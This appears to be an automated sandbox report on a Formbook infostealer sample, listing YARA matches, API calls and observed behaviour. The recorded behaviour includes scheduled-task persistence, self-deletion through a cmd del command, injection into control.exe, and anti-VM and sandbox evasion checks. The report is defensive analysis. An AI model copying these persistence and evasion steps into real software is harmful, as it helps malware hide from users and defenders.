Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 0_2_0288C124
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 0_2_0288E561
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 0_2_0288E570
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00401030
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B9C8
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041C272
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00408C5C
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00408C60
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B4A3
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00402D87
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00402D90
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0508F900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_05080D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050A4120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_05151D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0509D5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_05141002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0509841F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0509B090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050BEBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050A6E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC2FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC8C60
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC8C5C
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC2D87
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC2D90
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0508B150 appears 32 times
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED82F0 NtClose,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED8270 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED82EA NtClose,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED826A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED81BA NtCreateFile,
          Source: tgamf4XuLa.exe | Binary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000000.224546803.00000000006A2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.236927169.00000000029DB000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Binary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.339403773.0000000000862000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343404055.0000000001385000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343854917.000000000169F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HpnpObXJP.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File read: C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\tgamf4XuLa.exe 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File created: C:\Users\user\AppData\Roaming\HpnpObXJP.exe
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File created: C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/4@10/7
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
          Source: tgamf4XuLa.exe, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: tgamf4XuLa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: tgamf4XuLa.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: tgamf4XuLa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: tgamf4XuLa.exe, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDBA79 push 67258780h; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC0008 push edx; retf
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDC16B pushad ; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB46C push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB40B push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EDB402 push eax; ret
          Source: tgamf4XuLa.exe | Static PE information: 0x960770CE [Tue Oct 5 18:07:10 2049 UTC]
          Source: initial sample | Static PE information: section name: .text entropy: 7.16093944862
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File created: C:\Users\user\AppData\Roaming\HpnpObXJP.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\control.exe | Process created: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Windows\SysWOW64\control.exe | Process created: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: tgamf4XuLa.exe PID: 6056, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 0000000002EC85E4 second address: 0000000002EC85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 0000000002EC897E second address: 0000000002EC8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe TID: 6060 | Thread sleep time: -44461s >= -30000s
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe TID: 5884 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4420 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6580 | Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Thread delayed: delay time: 44461
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000007.00000000.264627879.00000000089F9000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.259017685.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
